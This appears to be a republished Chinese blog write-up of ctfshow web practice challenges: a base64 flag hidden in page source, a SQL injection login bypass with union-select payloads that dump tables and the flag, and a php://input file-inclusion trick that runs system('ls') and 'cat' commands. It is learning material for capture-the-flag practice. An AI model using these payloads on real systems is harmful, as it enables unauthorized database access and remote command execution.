当前位置:   article > 正文

刷web记录之ctfshow_ctf比赛sql where is flag 请输入一个1试试

ctf比赛sql where is flag 请输入一个1试试

记录ctfshow web 练习题

web签到题1

打开之后有一段话“where is flag? ”其他什么也没有,查看一下网络源代码发现里面有一段注释掉的beas64
在这里插入图片描述
将其进行解码就能得到flag
在这里插入图片描述

web2

打开之后是一个非常简陋的登录框根据题目所说这应该是一道sql注入
在这里插入图片描述首先进行简单的测试:

万能登录:admin' or 1=1#
密码:随意,只要有即可
  • 1
  • 2

在这里插入图片描述
在这里插入图片描述
登录之后,就可以开始尝试注入了,这道题可以看出来显示位是3,因此直接进行sql注入

admin' union select 1,database(),3#
  • 1

在这里插入图片描述
得到其数据库为web2

admin'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'#
  • 1

在这里插入图片描述可以得到其表名:flag,user

admin'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='web2' and table_name='flag'#
  • 1

在这里插入图片描述得到其字段名为flag

admin'union select 1,flag,3 from flag#
  • 1

在这里插入图片描述即可得到flag,这题很简单,是很基础的sql注入

web3

打开之后是一个很简洁的页面,提示有incldde构成的文件包含的漏洞,查看网页源代码并没有发现什么价值的东西。因为有文件包含漏洞,我们可以尝试使用伪协议:php://input给其构成命令执行漏洞

php://input
  • 1

在这里插入图片描述然后对所构造的页面进行抓包

在这里插入图片描述然后在构造命令:

<?php system("ls");?>
  • 1

在这里插入图片描述然后在构造命令查看ctf_go_go_go文件:

<?php system("cat ctf_go_go_go");?>
  • 1

得到结果:
在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小蓝xlanll/article/detail/443550
推荐阅读
相关标签
  

闽ICP备14008679号